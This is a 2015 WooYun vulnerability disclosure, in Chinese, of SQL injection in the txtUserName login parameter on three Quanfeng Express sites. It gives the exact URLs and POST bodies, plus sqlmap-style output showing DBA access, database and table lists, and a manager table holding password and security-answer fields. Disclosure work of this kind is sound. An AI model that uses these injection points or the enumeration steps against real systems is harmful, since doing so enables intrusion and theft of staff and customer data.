当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124791

漏洞标题:全峰快递多个站点同一注入点打包(DBA权限敏感信息泄露)

相关厂商:全峰快递

漏洞作者: 路人甲

提交时间:2015-07-07 19:32

修复时间:2015-08-21 19:32

公开时间:2015-08-21 19:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,多个站点同一sql注入打包,求20RANK

详细说明:

主站一处,另外两个分站oa,qfoa注入点一样dba权限,大量信息泄露

sql注入点
http://www.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=cmfqiinu&txtUserName=*&txtUserPwd=cmfqiinu&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
txtUserName参数存在注入


oa分站注入

http://oa.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=vtpvrdcv&txtUserName=*&txtUserPwd=vtpvrdcv&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
存在注入的参数txtUserName


qfoa站点

http://qfoa.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtUserName=*&txtUserPwd=iumhjsuw&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAZPoml5tC2dbv7RgYErGW9VY3plgk0YBAefRz3MyBlTcE5Fo5u8Nmrtdka2GVrCes085pbWlDO2hADfoPXD/5td8N6b9eOHXDcXf/kfPe5eg06GC4z/e0mb28yRSwVPyac%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYCAgEPFgIeB1Zpc2libGVoZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUNY2JSZW1lbWJlcklkMgUMY2JSZW1lbWJlcklk
txtUserName参数存在注入


漏洞证明:

oa1.jpg


部分数据证明,就不一一列举了
current user: 'qfoa'
current database: 'qfoadb2'
current user is DBA: True
available databases [14]:
[*] ccflow5
[*] DBSynchronous
[*] master
[*] model
[*] msdb
[*] PrintDB
[*] qfhy
[*] qfkd_back
[*] qfoadb2
[*] ReportServer
[*] ReportServerTempDB
[*] SinglePrint
[*] tempdb
[*] ZYSite
Database: qfoadb2
[129 tables]
+----------------------------+
| FB_manager |
| FB_manager_log |
| FB_search_shanghai |
| FB_shanghai_adress |
| FB_shanghai_no_resoult |
| FB_shanghai_resoult |
| FB_site |
| FB_site_address |
| SP_Customer |
| SP_SingleLog |
| TestTable |
| View_BaoXianLiPei |
| View_article_mend |
| View_diaocha |
| View_gzjindu |
| View_jiabanche |
| FB_diqu-biao |
| areas |
| bill_tbdd |
| dt_BaQiang_FuFei |
| dt_BaQiang_IT |
| dt_BaQiang_JiChu |
| dt_BaQiang_ShouFei |
| dt_BaQiang_SongXiu |
| dt_BaQiang_TuiHui |
| dt_BaQiang_ZhanDian |
| dt_BaoXianLiPei |
| dt_BaoXianLiPei_ChuLi |
| dt_BaoXianLiPei_ShenHe |
| dt_BaoXianLiPei_attach |
| dt_K8_FaJian |
| dt_K8_PaiJian |
| dt_K8_ZhongLiang |
| dt_Recruitment |
| dt_RecruitmentDetails |
| dt_amount_log |
| dt_article |
| dt_article_albums |
| dt_article_beizhu |
| dt_article_comment |
| dt_article_content |
| dt_article_download |
| dt_article_goods |
| dt_article_mend |
| dt_article_news |
| dt_article_tit |
| dt_attribute_value |
| dt_attributes |
| dt_baobiao_tongji |
| dt_category |
| dt_danpo |
| dt_danpo_news |
| dt_danwu |
| dt_danwu_news |
| dt_danyi |
| dt_danyi_news |
| dt_dcmingxi |
| dt_dczong |
| dt_distribution |
| dt_download_attach |
| dt_goods_group_price |
| dt_gzjindu |
| dt_jiabanche_genzong |
| dt_jiabanchedengji |
| dt_jiabanchejichu |
| dt_jiekuan_attach |
| dt_jiekuan_duiwai |
| dt_jiekuan_fuzeren |
| dt_jiekuan_geren |
| dt_jiekuan_gongsi |
| dt_jiekuan_jingying |
| dt_jiekuan_shengming |
| dt_jiekuan_shenqing |
| dt_jiekuan_tuijian |
| dt_jiekuan_tuotou |
| dt_jiekuan_tuotouS |
| dt_jiekuan_tuotouY |
| dt_jiekuan_wangdian |
| dt_jiekuan_xinyong |
| dt_jiekuan_yue |
| dt_jindu_content |
| dt_khjichu |
| dt_kpjichu |
| dt_kpmingxi |
| dt_kpzong |
| dt_loginlog |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_type |
| dt_manager_role_type_value |
| dt_manager_role_value |
| dt_manager_value |
| dt_nbtszdwh |
| dt_pqjlwh |
| dt_price |
| dt_qiandao_fx |
| dt_qiandao_fxls |
| dt_qiandao_hy |
| dt_qiandao_ry |
| dt_qiandao_ryls |
| dt_read |
| dt_rypingfen |
| dt_saixuan |
| dt_sys_channel |
| dt_sys_model |
| dt_sys_model_nav |
| dt_tousujianyi |
| dt_urllogin |
| dt_web |
| dt_web_content |
| dt_web_news |
| dt_zdpingfen |
| dt_zhiwei |
| sqlmapoutput |
| sysdiagrams |
| view_P2P_jiekuan |
| view_article_content |
| view_article_download |
| view_article_goods |
| view_article_news |
| view_danpo_news |
| view_danwu_news |
| view_danyi_news |
| view_qiandao_tuifang |
| view_sys_channel |
| view_web_content |
| view_web_news |
+----------------------------+
Database: qfoadb2
Table: dt_manager
[18 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| add_time | datetime |
| Answer | nvarchar |
| category_id | int |
| email | nvarchar |
| id | int |
| is_lock | int |
| k8username | nvarchar |
| Question | nvarchar |
| real_name | nvarchar |
| remark | nvarchar |
| role_id | nvarchar |
| role_type | int |
| SID | nvarchar |
| telephone | nvarchar |
| user_name | nvarchar |
| user_pwd | nvarchar |
| wangdian | nvarchar |
| zhiwei | int |
+-------------+----------+


oa2.jpg


oa3.jpg


oa4.jpg

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝